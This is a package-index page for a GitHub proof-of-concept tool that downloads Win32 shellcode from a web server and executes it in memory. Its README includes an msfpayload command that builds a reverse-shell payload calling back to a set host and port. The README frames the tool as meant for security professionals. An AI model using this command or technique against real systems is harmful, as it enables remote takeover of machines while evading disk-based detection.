Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/secretsquirrel/shellcode_retriever
POC of code that downloads and executes shellcode in memory.
https://github.com/secretsquirrel/shellcode_retriever
Last synced: 13 days ago
JSON representation
POC of code that downloads and executes shellcode in memory.
- Host: GitHub
- URL: https://github.com/secretsquirrel/shellcode_retriever
- Owner: secretsquirrel
- Created: 2013-08-17T17:48:14.000Z (about 11 years ago)
- Default Branch: master
- Last Pushed: 2014-05-25T16:59:06.000Z (over 10 years ago)
- Last Synced: 2024-05-02T04:55:15.562Z (7 months ago)
- Language: Python
- Size: 229 KB
- Stars: 80
- Watchers: 11
- Forks: 52
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
##Shellcode Retriever
Downloads win32 shellcode from webservers and executes the shellcode without it touching disk (using the following method: http://www.debasish.in/2012_04_01_archive.html)Demo:
http://www.youtube.com/watch?v=R15B2p-uWKY
---
For use by IT Security professionals and researchers.
Usage:
Create shellcode using the following msfpayload command:
msfpayload windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=8080 EXITFUNC=thread R > test.txt
Notice the exit function, very important if you want the process to run and beacon out based on timeouts in the source code.
Upload the shellcode to your webserver.
Compile the python code to an executeable by using pyinstaller.
---
##License: GPLv3
Shellcode Retriever
Author Joshua Pitts the.midnite.runr 'at' gmail com
Copyright (C) 2013, Joshua PittsLicense: GPLv3
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.See for a copy of the GNU General
Public LicenseThis program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.